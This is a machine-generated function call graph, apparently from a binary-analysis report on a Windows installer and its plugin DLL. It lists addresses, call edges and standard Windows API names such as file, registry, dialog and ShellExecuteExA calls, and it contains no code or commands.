5120->5122 5121 6e4b14c7 5121->5109 5122->5121 5123 6e4b14d3 GlobalFree 5122->5123 5123->5109 4640 4014d6 4641 402bac 17 API calls 4640->4641 4642 4014dc Sleep 4641->4642 4644 402a5a 4642->4644 4657 401759 4658 402bce 17 API calls 4657->4658 4659 401760 4658->4659 4660 401786 4659->4660 4661 40177e 4659->4661 4698 4060f7 lstrcpynA 4660->4698 4697 4060f7 lstrcpynA 4661->4697 4664 401784 4668 4063d2 5 API calls 4664->4668 4665 401791 4666 405a8f 3 API calls 4665->4666 4667 401797 lstrcatA 4666->4667 4667->4664 4671 4017a3 4668->4671 4669 40646b 2 API calls 4669->4671 4670 4017e4 4672 405c6b 2 API calls 4670->4672 4671->4669 4671->4670 4674 4017ba CompareFileTime 4671->4674 4675 40187e 4671->4675 4678 4060f7 lstrcpynA 4671->4678 4683 40618a 17 API calls 4671->4683 4692 405813 MessageBoxIndirectA 4671->4692 4695 401855 4671->4695 4696 405c90 GetFileAttributesA CreateFileA 4671->4696 4672->4671 4674->4671 4676 40521e 24 API calls 4675->4676 4679 401888 4676->4679 4677 40521e 24 API calls 4685 40186a 4677->4685 4678->4671 4680 4030d8 31 API calls 4679->4680 4681 40189b 4680->4681 4682 4018af SetFileTime 4681->4682 4684 4018c1 CloseHandle 4681->4684 4682->4684 4683->4671 4684->4685 4686 4018d2 4684->4686 4687 4018d7 4686->4687 4688 4018ea 4686->4688 4690 40618a 17 API calls 4687->4690 4689 40618a 17 API calls 4688->4689 4691 4018f2 4689->4691 4693 4018df lstrcatA 4690->4693 4691->4685 4694 405813 MessageBoxIndirectA 4691->4694 4692->4671 4693->4691 4694->4685 4695->4677 4695->4685 4696->4671 4697->4664 4698->4665 5523 401959 5524 402bac 17 API calls 5523->5524 5525 401960 5524->5525 5526 402bac 17 API calls 5525->5526 5527 40196d 5526->5527 5528 402bce 17 API calls 5527->5528 5529 401984 lstrlenA 5528->5529 5530 401994 5529->5530 5533 4019d4 5530->5533 5535 4060f7 lstrcpynA 5530->5535 5532 4019c4 5532->5533 5534 4019c9 lstrlenA 5532->5534 5534->5533 5535->5532 5669 6e4b15d1 5670 6e4b14bb GlobalFree 5669->5670 5673 6e4b15e9 5670->5673 5671 6e4b162f GlobalFree 5672 6e4b1604 5672->5671 5673->5671 5673->5672 5674 6e4b161b VirtualFree 5673->5674 5674->5671 5536 40535c 5537 405507 5536->5537 5538 40537e GetDlgItem GetDlgItem GetDlgItem 5536->5538 5540 405537 5537->5540 5541 40550f GetDlgItem CreateThread CloseHandle 5537->5541 5581 4041b0 SendMessageA 5538->5581 5543 405565 5540->5543 5544 405586 5540->5544 5545 40554d ShowWindow ShowWindow 5540->5545 5541->5540 5542 4053ee 5550 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5542->5550 5546 4055c0 5543->5546 5547 405575 5543->5547 5548 405599 ShowWindow 5543->5548 5549 4041e2 8 API calls 5544->5549 5583 4041b0 SendMessageA 5545->5583 5546->5544 5557 4055cd SendMessageA 5546->5557 5552 404154 SendMessageA 5547->5552 5553 4055b9 5548->5553 5554 4055ab 5548->5554 5563 405592 5549->5563 5555 405463 5550->5555 5556 405447 SendMessageA SendMessageA 5550->5556 5552->5544 5559 404154 SendMessageA 5553->5559 5558 40521e 24 API calls 5554->5558 5560 405476 5555->5560 5561 405468 SendMessageA 5555->5561 5556->5555 5562 4055e6 CreatePopupMenu 5557->5562 5557->5563 5558->5553 5559->5546 5565 40417b 18 API calls 5560->5565 5561->5560 5564 40618a 17 API calls 5562->5564 5567 4055f6 AppendMenuA 5564->5567 5566 405486 5565->5566 5570 4054c3 GetDlgItem SendMessageA 5566->5570 5571 40548f ShowWindow 5566->5571 5568 405614 GetWindowRect 5567->5568 5569 405627 TrackPopupMenu 5567->5569 5568->5569 5569->5563 5572 405643 5569->5572 5570->5563 5575 4054ea SendMessageA SendMessageA 5570->5575 5573 4054b2 5571->5573 5574 4054a5 ShowWindow 5571->5574 5576 405662 SendMessageA 5572->5576 5582 4041b0 SendMessageA 5573->5582 5574->5573 5575->5563 5576->5576 5577 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5576->5577 5579 4056a1 SendMessageA 5577->5579 5579->5579 5580 4056c3 GlobalUnlock SetClipboardData CloseClipboard 5579->5580 5580->5563 5581->5542 5582->5570 5583->5543 5584 40275d 5585 402763 5584->5585 5586 402a5a 5585->5586 5587 40276b FindClose 5585->5587 5587->5586 5124 401a5e 5125 402bac 17 API calls 5124->5125 5126 401a67 5125->5126 5127 402bac 17 API calls 5126->5127 5128 401a0e 5127->5128 5588 40495e 5589 40498a 5588->5589 5590 40496e 5588->5590 5592 404990 SHGetPathFromIDListA 5589->5592 5593 4049bd 5589->5593 5599 4057f7 GetDlgItemTextA 5590->5599 5595 4049a0 5592->5595 5596 4049a7 SendMessageA 5592->5596 5594 40497b SendMessageA 5594->5589 5597 40140b 2 API calls 5595->5597 5596->5593 5597->5596 5599->5594 5675 4029de 5676 406500 5 API calls 5675->5676 5677 4029e5 5676->5677 5678 402bce 17 API calls 5677->5678 5679 4029ee 5678->5679 5681 402a2a 5679->5681 5685 40614a 5679->5685 5682 4029fc 5682->5681 5689 406134 5682->5689 5686 406155 5685->5686 5687 406178 IIDFromString 5686->5687 5688 406171 5686->5688 5687->5682 5688->5682 5692 406119 WideCharToMultiByte 5689->5692 5691 402a1d CoTaskMemFree 5691->5681 5692->5691 5693 4027df 5694 402bce 17 API calls 5693->5694 5696 4027ed 5694->5696 5695 402803 5698 405c6b 2 API calls 5695->5698 5696->5695 5697 402bce 17 API calls 5696->5697 5697->5695 5699 402809 5698->5699 5721 405c90 GetFileAttributesA CreateFileA 5699->5721 5701 402816 5702 402822 GlobalAlloc 5701->5702 5703 4028bf 5701->5703 5704 4028b6 CloseHandle 5702->5704 5705 40283b 5702->5705 5706 4028c7 DeleteFileA 5703->5706 5707 4028da 5703->5707 5704->5703 5722 403300 SetFilePointer 5705->5722 5706->5707 5709 402841 5710 4032ea ReadFile 5709->5710 5711 40284a GlobalAlloc 5710->5711 5712 402894 5711->5712 5713 40285a 5711->5713 5714 405d37 WriteFile 5712->5714 5715 4030d8 31 API calls 5713->5715 5716 4028a0 GlobalFree 5714->5716 5720 402867 5715->5720 5717 4030d8 31 API calls 5716->5717 5719 4028b3 5717->5719 5718 40288b GlobalFree 5718->5712 5719->5704 5720->5718 5721->5701 5722->5709 4899 4023e0 4900 402bce 17 API calls 4899->4900 4901 4023f1 4900->4901 4902 402bce 17 API calls 4901->4902 4903 4023fa 4902->4903 4904 402bce 17 API calls 4903->4904 4905 402404 GetPrivateProfileStringA 4904->4905 5308 4028e0 5309 402bac 17 API calls 5308->5309 5310 4028e6 5309->5310 5311 402925 5310->5311 5312 40290e 5310->5312 5319 4027bf 5310->5319 5313 40293f 5311->5313 5314 40292f 5311->5314 5317 402913 5312->5317 5318 402922 5312->5318 5316 40618a 17 API calls 5313->5316 5315 402bac 17 API calls 5314->5315 5315->5319 5316->5319 5322 4060f7 lstrcpynA 5317->5322 5323 406055 wsprintfA 5318->5323 5322->5319 5323->5319 5600 401b63 5601 402bce 17 API calls 5600->5601 5602 401b6a 5601->5602 5603 402bac 17 API calls 5602->5603 5604 401b73 wsprintfA 5603->5604 5605 402a5a 5604->5605 5606 401d65 5607 401d78 GetDlgItem 5606->5607 5608 401d6b 5606->5608 5610 401d72 5607->5610 5609 402bac 17 API calls 5608->5609 5609->5610 5611 402bce 17 API calls 5610->5611 5613 401db9 GetClientRect LoadImageA SendMessageA 5610->5613 5611->5613 5614 401e1a 5613->5614 5616 401e26 5613->5616 5615 401e1f DeleteObject 5614->5615 5614->5616 5615->5616 5324 4042e6 5325 404408 5324->5325 5326 4042fc 5324->5326 5327 404477 5325->5327 5331 404541 5325->5331 5336 40444c GetDlgItem SendMessageA 5325->5336 5328 40417b 18 API calls 5326->5328 5329 404481 GetDlgItem 5327->5329 5327->5331 5330 404352 5328->5330 5332 404497 5329->5332 5333 4044ff 5329->5333 5334 40417b 18 API calls 5330->5334 5335 4041e2 8 API calls 5331->5335 5332->5333 5339 4044bd SendMessageA LoadCursorA SetCursor 5332->5339 5333->5331 5340 404511 5333->5340 5337 40435f CheckDlgButton 5334->5337 5338 40453c 5335->5338 5357 40419d EnableWindow 5336->5357 5355 40419d EnableWindow 5337->5355 5358 40458a 5339->5358 5345 404517 SendMessageA 5340->5345 5346 404528 5340->5346 5342 404472 5347 404566 SendMessageA 5342->5347 5345->5346 5346->5338 5350 40452e SendMessageA 5346->5350 5347->5327 5348 40437d GetDlgItem 5356 4041b0 SendMessageA 5348->5356 5350->5338 5352 404393 SendMessageA 5353 4043b1 GetSysColor 5352->5353 5354 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5352->5354 5353->5354 5354->5338 5355->5348 5356->5352 5357->5342 5361 4057d9 ShellExecuteExA 5358->5361 5360 4044f0 LoadCursorA SetCursor 5360->5333 5361->5360 5723 6e4b2be3 5724 6e4b2bfb 5723->5724 5725 6e4b1534 2 API calls 5724->5725 5726 6e4b2c16 5725->5726 4947 40166a 4948 402bce 17 API calls 4947->4948 4949 401671 4948->4949 4950 402bce 17 API calls 4949->4950 4951 40167a 4950->4951 4952 402bce 17 API calls 4951->4952 4953 401683 MoveFileA 4952->4953 4954 401696 4953->4954 4955 40168f 4953->4955 4956 40646b 2 API calls 4954->4956 4959 4022e2 4954->4959 4957 401423 24 API calls 4955->4957 4958 4016a5 4956->4958 4957->4959 4958->4959 4960 405ed6 36 API calls 4958->4960 4960->4955 4964 40216b 4965 402bce 17 API calls 4964->4965 4966 402172 4965->4966 4967 402bce 17 API calls 4966->4967 4968 40217c 4967->4968 4969 402bce 17 API calls 4968->4969 4970 402186 4969->4970 4971 402bce 17 API calls 4970->4971 4972 402193 4971->4972 4973 402bce 17 API calls 4972->4973 4974 40219d 4973->4974 4975 4021df CoCreateInstance 4974->4975 4976 402bce 17 API calls 4974->4976 4979 4021fe 4975->4979 4981 4022ac 4975->4981 4976->4975 4977 401423 24 API calls 4978 4022e2 4977->4978 4980 40228c MultiByteToWideChar 4979->4980 4979->4981 4980->4981 4981->4977 4981->4978 5362 4022eb 5363 402bce 17 API calls 5362->5363 5364 4022f1 5363->5364 5365 402bce 17 API calls 5364->5365 5366 4022fa 5365->5366 5367 402bce 17 API calls 5366->5367 5368 402303 5367->5368 5369 40646b 2 API calls 5368->5369 5370 40230c 5369->5370 5371 402310 5370->5371 5372 40231d lstrlenA lstrlenA 5370->5372 5373 40521e 24 API calls 5371->5373 5376 402318 5371->5376 5374 40521e 24 API calls 5372->5374 5373->5376 5375 402359 SHFileOperationA 5374->5375 5375->5371 5375->5376 5377 6e4b10e0 5386 6e4b110e 5377->5386 5378 6e4b11c4 GlobalFree 5379 6e4b12ad 2 API calls 5379->5386 5380 6e4b11c3 5380->5378 5381 6e4b11ea GlobalFree 5381->5386 5382 6e4b1266 2 API calls 5385 6e4b11b1 GlobalFree 5382->5385 5383 6e4b1155 GlobalAlloc 5383->5386 5384 6e4b12d1 lstrcpyA 5384->5386 5385->5386 5386->5378 5386->5379 5386->5380 5386->5381 5386->5382 5386->5383 5386->5384 5386->5385 4991 40266d 4992 402bac 17 API calls 4991->4992 4997 402677 4992->4997 4993 4026e5 4994 405d08 ReadFile 4994->4997 4995 4026e7 5000 406055 wsprintfA 4995->5000 4996 4026f7 4996->4993 4999 40270d SetFilePointer 4996->4999 4997->4993 4997->4994 4997->4995 4997->4996 4999->4993 5000->4993 5617 40236d 5618 402374 5617->5618 5621 402387 5617->5621 5619 40618a 17 API calls 5618->5619 5620 402381 5619->5620 5620->5621 5622 405813 MessageBoxIndirectA 5620->5622 5622->5621 5727 4019ed 5728 402bce 17 API calls 5727->5728 5729 4019f4 5728->5729 5730 402bce 17 API calls 5729->5730 5731 4019fd 5730->5731 5732 401a04 lstrcmpiA 5731->5732 5733 401a16 lstrcmpA 5731->5733 5734 401a0a 5732->5734 5733->5734 5623 40296e 5624 402bac 17 API calls 5623->5624 5625 402974 5624->5625 5626 4029af 5625->5626 5627 4027bf 5625->5627 5629 402986 5625->5629 5626->5627 5628 40618a 17 API calls 5626->5628 5628->5627 5629->5627 5631 406055 wsprintfA 5629->5631 5631->5627 5387 4014f4 SetForegroundWindow 5388 402a5a 5387->5388 5037 402476 5038 402bce 17 API calls 5037->5038 5039 402488 5038->5039 5040 402bce 17 API calls 5039->5040 5041 402492 5040->5041 5054 402c5e 5041->5054 5044 4024c7 5047 402bac 17 API calls 5044->5047 5049 4024d3 5044->5049 5045 402a5a 5046 402bce 17 API calls 5050 4024c0 lstrlenA 5046->5050 5047->5049 5048 4024f5 RegSetValueExA 5052 40250b RegCloseKey 5048->5052 5049->5048 5051 4030d8 31 API calls 5049->5051 5050->5044 5051->5048 5052->5045 5055 402c79 5054->5055 5058 405fab 5055->5058 5059 405fba 5058->5059 5060 4024a2 5059->5060 5061 405fc5 RegCreateKeyExA 5059->5061 5060->5044 5060->5045 5060->5046 5061->5060 5632 402777 5633 40277d 5632->5633 5634 402781 FindNextFileA 5633->5634 5635 402793 5633->5635 5634->5635 5636 4027d2 5634->5636 5638 4060f7 lstrcpynA 5636->5638 5638->5635 5389 401ef9 5390 402bce 17 API calls 5389->5390 5391 401eff 5390->5391 5392 402bce 17 API calls 5391->5392 5393 401f08 5392->5393 5394 402bce 17 API calls 5393->5394 5395 401f11 5394->5395 5396 402bce 17 API calls 5395->5396 5397 401f1a 5396->5397 5398 401423 24 API calls 5397->5398 5399 401f21 5398->5399 5406 4057d9 ShellExecuteExA 5399->5406 5401 4027bf 5402 401f5c 5402->5401 5403 406575 5 API calls 5402->5403 5404 401f76 CloseHandle 5403->5404 5404->5401 5406->5402 5062 401f7b 5063 402bce 17 API calls 5062->5063 5064 401f81 5063->5064 5065 40521e 24 API calls 5064->5065 5066 401f8b 5065->5066 5067 405796 2 API calls 5066->5067 5068 401f91 5067->5068 5069 401fb2 CloseHandle 5068->5069 5073 4027bf 5068->5073 5077 406575 WaitForSingleObject 5068->5077 5069->5073 5072 401fa6 5074 401fb4 5072->5074 5075 401fab 5072->5075 5074->5069 5082 406055 wsprintfA 5075->5082 5078 40658f 5077->5078 5079 4065a1 GetExitCodeProcess 5078->5079 5080 40653c 2 API calls 5078->5080 5079->5072 5081 406596 WaitForSingleObject 5080->5081 5081->5078 5082->5069 5735 401ffb 5736 402bce 17 API calls 5735->5736 5737 402002 5736->5737 5738 406500 5 API calls 5737->5738 5739 402011 5738->5739 5740 402029 GlobalAlloc 5739->5740 5749 402091 5739->5749 5741 40203d 5740->5741 5740->5749 5742 406500 5 API calls 5741->5742 5743 402044 5742->5743 5744 406500 5 API calls 5743->5744 5745 40204e 5744->5745 5745->5749 5750 406055 wsprintfA 5745->5750 5747 402085 5751 406055 wsprintfA 5747->5751 5750->5747 5751->5749 5407 4018fd 5408 401934 5407->5408 5409 402bce 17 API calls 5408->5409 5410 401939 5409->5410 5411 4058bf 67 API calls 5410->5411 5412 401942 5411->5412 5129 401000 5130 401037 BeginPaint GetClientRect 5129->5130 5131 40100c DefWindowProcA 5129->5131 5132 4010f3 5130->5132 5134 401179 5131->5134 5135 401073 CreateBrushIndirect FillRect DeleteObject 5132->5135 5136 4010fc 5132->5136 5135->5132 5137 401102 CreateFontIndirectA 5136->5137 5138 401167 EndPaint 5136->5138 5137->5138 5139 401112 6 API calls 5137->5139 5138->5134 5139->5138 5639 401900 5640 402bce 17 API calls 5639->5640 5641 401907 5640->5641 5642 405813 MessageBoxIndirectA 5641->5642 5643 401910 5642->5643 5752 404b80 GetDlgItem GetDlgItem 5753 404bd6 7 API calls 5752->5753 5761 404dfd 5752->5761 5754 404c72 SendMessageA 5753->5754 5755 404c7e DeleteObject 5753->5755 5754->5755 5756 404c89 5755->5756 5757 404cc0 5756->5757 5762 40618a 17 API calls 5756->5762 5759 40417b 18 API calls 5757->5759 5758 404edf 5760 404f8b 5758->5760 5764 404df0 5758->5764 5770 404f38 SendMessageA 5758->5770 5763 404cd4 5759->5763 5765 404f95 SendMessageA 5760->5765 5766 404f9d 5760->5766 5761->5758 5786 404e6c 5761->5786 5806 404ace SendMessageA 5761->5806 5767 404ca2 SendMessageA SendMessageA 5762->5767 5769 40417b 18 API calls 5763->5769 5772 4041e2 8 API calls 5764->5772 5765->5766 5774 404fb6 5766->5774 5775 404faf ImageList_Destroy 5766->5775 5782 404fc6 5766->5782 5767->5756 5787 404ce5 5769->5787 5770->5764 5777 404f4d SendMessageA 5770->5777 5771 404ed1 SendMessageA 5771->5758 5773 40518b 5772->5773 5778 404fbf GlobalFree 5774->5778 5774->5782 5775->5774 5776 40513f 5776->5764 5783 405151 ShowWindow GetDlgItem ShowWindow 5776->5783 5780 404f60 5777->5780 5778->5782 5779 404dbf GetWindowLongA SetWindowLongA 5781 404dd8 5779->5781 5791 404f71 SendMessageA 5780->5791 5784 404df5 5781->5784 5785 404ddd ShowWindow 5781->5785 5782->5776 5797 405001 5782->5797 5811 404b4e 5782->5811 5783->5764 5805 4041b0 SendMessageA 5784->5805 5804 4041b0 SendMessageA 5785->5804 5786->5758 5786->5771 5787->5779 5790 404d37 SendMessageA 5787->5790 5792 404dba 5787->5792 5794 404d75 SendMessageA 5787->5794 5795 404d89 SendMessageA 5787->5795 5790->5787 5791->5760 5792->5779 5792->5781 5793 405045 5798 40510b 5793->5798 5802 4050b9 SendMessageA SendMessageA 5793->5802 5794->5787 5795->5787 5797->5793 5800 40502f SendMessageA 5797->5800 5799 405115 InvalidateRect 5798->5799 5801 405121 5798->5801 5799->5801 5800->5793 5801->5776 5803 404a89 20 API calls 5801->5803 5802->5793 5803->5776 5804->5764 5805->5761 5807 404af1 GetMessagePos ScreenToClient SendMessageA 5806->5807 5808 404b2d SendMessageA 5806->5808 5809 404b25 5807->5809 5810 404b2a 5807->5810 5808->5809 5809->5786 5810->5808 5820 4060f7 lstrcpynA 5811->5820 5813 404b61 5821 406055 wsprintfA 5813->5821 5815 404b6b 5816 40140b 2 API calls 5815->5816 5817 404b74 5816->5817 5822 4060f7 lstrcpynA 5817->5822 5819 404b7b 5819->5797 5820->5813 5821->5815 5822->5819 5644 401502 5645 40150a 5644->5645 5647 40151d 5644->5647 5646 402bac 17 API calls 5645->5646 5646->5647 5140 402604 5141 402bce 17 API calls 5140->5141 5142 40260b 5141->5142 5145 405c90 GetFileAttributesA CreateFileA 5142->5145 5144 402617 5145->5144 5823 401b87 5824 401b94 5823->5824 5825 401bd8 5823->5825 5826 401c1c 5824->5826 5832 401bab 5824->5832 5827 401c01 GlobalAlloc 5825->5827 5828 401bdc 5825->5828 5830 40618a 17 API calls 5826->5830 5835 402387 5826->5835 5829 40618a 17 API calls 5827->5829 5828->5835 5844 4060f7 lstrcpynA 5828->5844 5829->5826 5836 402381 5830->5836 5842 4060f7 lstrcpynA 5832->5842 5833 401bee GlobalFree 5833->5835 5836->5835 5837 405813 MessageBoxIndirectA 5836->5837 5837->5835 5838 401bba 5843 4060f7 lstrcpynA 5838->5843 5840 401bc9 5845 4060f7 lstrcpynA 5840->5845 5842->5838 5843->5840 5844->5833 5845->5835 4619 402588 4631 402c0e 4619->4631 4622 402bac 17 API calls 4623 40259b 4622->4623 4624 4025a9 4623->4624 4629 4027bf 4623->4629 4625 4025c2 RegEnumValueA 4624->4625 4626 4025b6 RegEnumKeyA 4624->4626 4627 4025de RegCloseKey 4625->4627 4628 4025d7 4625->4628 4626->4627 4627->4629 4628->4627 4632 402bce 17 API calls 4631->4632 4633 402c25 4632->4633 4634 405f7d RegOpenKeyExA 4633->4634 4635 402592 4634->4635 4635->4622 4636 401389 4638 401390 4636->4638 4637 4013fe 4638->4637 4639 4013cb MulDiv SendMessageA 4638->4639 4639->4638 5146 6e4b1000 5149 6e4b101b 5146->5149 5150 6e4b14bb GlobalFree 5149->5150 5151 6e4b1020 5150->5151 5152 6e4b1027 GlobalAlloc 5151->5152 5153 6e4b1024 5151->5153 5152->5153 5154 6e4b14e2 3 API calls 5153->5154 5155 6e4b1019 5154->5155 5156 40460d 5157 404639 5156->5157 5158 40464a 5156->5158 5217 4057f7 GetDlgItemTextA 5157->5217 5159 404656 GetDlgItem 5158->5159 5165 4046b5 5158->5165 5162 40466a 5159->5162 5161 404644 5164 4063d2 5 API calls 5161->5164 5166 40467e SetWindowTextA 5162->5166 5169 405b28 4 API calls 5162->5169 5163 404799 5215 404943 5163->5215 5222 4057f7 GetDlgItemTextA 5163->5222 5164->5158 5165->5163 5171 40618a 17 API calls 5165->5171 5165->5215 5218 40417b 5166->5218 5174 404674 5169->5174 5176 404729 SHBrowseForFolderA 5171->5176 5172 4047c9 5177 405b7d 18 API calls 5172->5177 5174->5166 5181 405a8f 3 API calls 5174->5181 5175 40469a 5178 40417b 18 API calls 5175->5178 5176->5163 5179 404741 CoTaskMemFree 5176->5179 5180 4047cf 5177->5180 5182 4046a8 5178->5182 5183 405a8f 3 API calls 5179->5183 5223 4060f7 lstrcpynA 5180->5223 5181->5166 5221 4041b0 SendMessageA 5182->5221 5185 40474e 5183->5185 5188 404785 SetDlgItemTextA 5185->5188 5192 40618a 17 API calls 5185->5192 5187 4046ae 5190 406500 5 API calls 5187->5190 5188->5163 5189 4047e6 5191 406500 5 API calls 5189->5191 5190->5165 5199 4047ed 5191->5199 5193 40476d lstrcmpiA 5192->5193 5193->5188 5195 40477e lstrcatA 5193->5195 5194 404829 5224 4060f7 lstrcpynA 5194->5224 5195->5188 5197 404830 5198 405b28 4 API calls 5197->5198 5200 404836 GetDiskFreeSpaceA 5198->5200 5199->5194 5203 405ad6 2 API calls 5199->5203 5205 404881 5199->5205 5202 40485a MulDiv 5200->5202 5200->5205 5202->5205 5203->5199 5204 4048f2 5207 404915 5204->5207 5209 40140b 2 API calls 5204->5209 5205->5204 5225 404a89 5205->5225 5236 40419d EnableWindow 5207->5236 5209->5207 5210 4048f4 SetDlgItemTextA 5210->5204 5211 4048e4 5228 4049c4 5211->5228 5214 404931 5214->5215 5237 404566 5214->5237 5240 4041e2 5215->5240 5217->5161 5219 40618a 17 API calls 5218->5219 5220 404186 SetDlgItemTextA 5219->5220 5220->5175 5221->5187 5222->5172 5223->5189 5224->5197 5226 4049c4 20 API calls 5225->5226 5227 4048df 5226->5227 5227->5210 5227->5211 5229 4049da 5228->5229 5230 40618a 17 API calls 5229->5230 5231 404a3e 5230->5231 5232 40618a 17 API calls 5231->5232 5233 404a49 5232->5233 5234 40618a 17 API calls 5233->5234 5235 404a5f lstrlenA wsprintfA SetDlgItemTextA 5234->5235 5235->5204 5236->5214 5238 404574 5237->5238 5239 404579 SendMessageA 5237->5239 5238->5239 5239->5215 5241 4042a5 5240->5241 5242 4041fa GetWindowLongA 5240->5242 5242->5241 5243 40420f 5242->5243 5243->5241 5244 40423c GetSysColor 5243->5244 5245 40423f 5243->5245 5244->5245 5246 404245 SetTextColor 5245->5246 5247 40424f SetBkMode 5245->5247 5246->5247 5248 404267 GetSysColor 5247->5248 5249 40426d 5247->5249 5248->5249 5250 404274 SetBkColor 5249->5250 5251 40427e 5249->5251 5250->5251 5251->5241 5252 404291 DeleteObject 5251->5252 5253 404298 CreateBrushIndirect 5251->5253 5252->5253 5253->5241 5413 401490 5414 40521e 24 API calls 5413->5414 5415 401497 5414->5415 5846 405192 5847 4051a2 5846->5847 5848 4051b6 5846->5848 5849 4051a8 5847->5849 5858 4051ff 5847->5858 5850 4051be IsWindowVisible 5848->5850 5856 4051d5 5848->5856 5852 4041c7 SendMessageA 5849->5852 5853 4051cb 5850->5853 5850->5858 5851 405204 CallWindowProcA 5854 4051b2 5851->5854 5852->5854 5855 404ace 5 API calls 5853->5855 5855->5856 5856->5851 5857 404b4e 4 API calls 5856->5857 5857->5858 5858->5851 4645 402516 4646 402c0e 17 API calls 4645->4646 4647 402520 4646->4647 4648 402bce 17 API calls 4647->4648 4649 402529 4648->4649 4650 402533 RegQueryValueExA 4649->4650 4655 4027bf 4649->4655 4651 402553 4650->4651 4652 402559 RegCloseKey 4650->4652 4651->4652 4656 406055 wsprintfA 4651->4656 4652->4655 4656->4652 4699 40239c 4700 4023a4 4699->4700 4701 4023aa 4699->4701 4702 402bce 17 API calls 4700->4702 4703 4023ba 4701->4703 4704 402bce 17 API calls 4701->4704 4702->4701 4705 402bce 17 API calls 4703->4705 4707 4023c8 4703->4707 4704->4703 4705->4707 4706 402bce 17 API calls 4708 4023d1 WritePrivateProfileStringA 4706->4708 4707->4706 4709 40209d 4710 40215d 4709->4710 4711 4020af 4709->4711 4713 401423 24 API calls 4710->4713 4712 402bce 17 API calls 4711->4712 4714 4020b6 4712->4714 4720 4022e2 4713->4720 4715 402bce 17 API calls 4714->4715 4716 4020bf 4715->4716 4717 4020d4 LoadLibraryExA 4716->4717 4718 4020c7 GetModuleHandleA 4716->4718 4717->4710 4719 4020e4 GetProcAddress 4717->4719 4718->4717 4718->4719 4721 402130 4719->4721 4722 4020f3 4719->4722 4725 40521e 24 API calls 4721->4725 4723 402112 4722->4723 4724 4020fb 4722->4724 4730 6e4b16db 4723->4730 4770 401423 4724->4770 4727 402103 4725->4727 4727->4720 4728 402151 FreeLibrary 4727->4728 4728->4720 4731 6e4b170b 4730->4731 4773 6e4b1a98 4731->4773 4733 6e4b1712 4734 6e4b1834 4733->4734 4735 6e4b172a 4733->4735 4736 6e4b1723 4733->4736 4734->4727 4807 6e4b22f1 4735->4807 4824 6e4b22af 4736->4824 4741 6e4b174f 4742 6e4b178e 4741->4742 4743 6e4b1770 4741->4743 4746 6e4b17dc 4742->4746 4747 6e4b1794 4742->4747 4837 6e4b24d8 4743->4837 4744 6e4b1759 4744->4741 4834 6e4b2cc3 4744->4834 4745 6e4b1740 4749 6e4b1746 4745->4749 4755 6e4b1751 4745->4755 4753 6e4b24d8 11 API calls 4746->4753 4851 6e4b156b 4747->4851 4749->4741 4818 6e4b2a38 4749->4818 4758 6e4b17cd 4753->4758 4754 6e4b1776 4848 6e4b1266 4754->4848 4828 6e4b26b2 4755->4828 4762 6e4b1823 4758->4762 4857 6e4b249e 4758->4857 4759 6e4b1757 4759->4741 4760 6e4b24d8 11 API calls 4760->4758 4762->4734 4764 6e4b182d GlobalFree 4762->4764 4764->4734 4767 6e4b180f 4767->4762 4861 6e4b14e2 wsprintfA 4767->4861 4768 6e4b1808 FreeLibrary 4768->4767 4771 40521e 24 API calls 4770->4771 4772 401431 4771->4772 4772->4727 4864 6e4b1215 GlobalAlloc 4773->4864 4775 6e4b1abf 4865 6e4b1215 GlobalAlloc 4775->4865 4777 6e4b1d00 GlobalFree GlobalFree GlobalFree 4778 6e4b1d1d 4777->4778 4797 6e4b1d67 4777->4797 4780 6e4b20f1 4778->4780 4788 6e4b1d32 4778->4788 4778->4797 4779 6e4b1bbd GlobalAlloc 4794 6e4b1aca 4779->4794 4781 6e4b2113 GetModuleHandleA 4780->4781 4780->4797 4784 6e4b2139 4781->4784 4785 6e4b2124 LoadLibraryA 4781->4785 4782 6e4b1c08 lstrcpyA 4787 6e4b1c12 lstrcpyA 4782->4787 4783 6e4b1c26 GlobalFree 4783->4794 4872 6e4b15c2 GetProcAddress 4784->4872 4785->4784 4785->4797 4787->4794 4788->4797 4868 6e4b1224 4788->4868 4789 6e4b218a 4793 6e4b2197 lstrlenA 4789->4793 4789->4797 4790 6e4b1fb7 4871 6e4b1215 GlobalAlloc 4790->4871 4873 6e4b15c2 GetProcAddress 4793->4873 4794->4777 4794->4779 4794->4782 4794->4783 4794->4787 4794->4790 4795 6e4b1ef9 GlobalFree 4794->4795 4796 6e4b2033 4794->4796 4794->4797 4800 6e4b1224 2 API calls 4794->4800 4801 6e4b1c64 4794->4801 4795->4794 4796->4797 4804 6e4b208c lstrcpyA 4796->4804 4797->4733 4798 6e4b214b 4798->4789 4805 6e4b2174 GetProcAddress 4798->4805 4800->4794 4801->4794 4866 6e4b1534 GlobalSize GlobalAlloc 4801->4866 4802 6e4b21b0 4802->4797 4804->4797 4805->4789 4806 6e4b1fbf 4806->4733 4812 6e4b230a 4807->4812 4809 6e4b2446 GlobalFree 4810 6e4b1730 4809->4810 4809->4812 4810->4741 4810->4744 4810->4745 4811 6e4b23b8 GlobalAlloc MultiByteToWideChar 4814 6e4b23e4 GlobalAlloc 4811->4814 4815 6e4b2405 4811->4815 4812->4809 4812->4811 4813 6e4b1224 GlobalAlloc lstrcpynA 4812->4813 4812->4815 4875 6e4b12ad 4812->4875 4813->4812 4816 6e4b23fc GlobalFree 4814->4816 4815->4809 4879 6e4b2646 4815->4879 4816->4809 4820 6e4b2a4a 4818->4820 4819 6e4b2aef VirtualAllocEx 4823 6e4b2b0d 4819->4823 4820->4819 4822 6e4b2bd9 4822->4741 4882 6e4b29e4 4823->4882 4825 6e4b22c4 4824->4825 4826 6e4b1729 4825->4826 4827 6e4b22cf GlobalAlloc 4825->4827 4826->4735 4827->4825 4832 6e4b26e2 4828->4832 4829 6e4b277d GlobalAlloc 4833 6e4b27a0 4829->4833 4830 6e4b2790 4831 6e4b2796 GlobalSize 4830->4831 4830->4833 4831->4833 4832->4829 4832->4830 4833->4759 4835 6e4b2cce 4834->4835 4836 6e4b2d0e GlobalFree 4835->4836 4886 6e4b1215 GlobalAlloc 4837->4886 4839 6e4b24e4 4840 6e4b2598 WideCharToMultiByte 4839->4840 4841 6e4b2563 lstrcpynA 4839->4841 4842 6e4b2574 StringFromGUID2 WideCharToMultiByte 4839->4842 4843 6e4b25b9 wsprintfA 4839->4843 4844 6e4b25dd GlobalFree 4839->4844 4845 6e4b2617 GlobalFree 4839->4845 4846 6e4b1266 2 API calls 4839->4846 4887 6e4b12d1 4839->4887 4840->4839 4841->4839 4842->4839 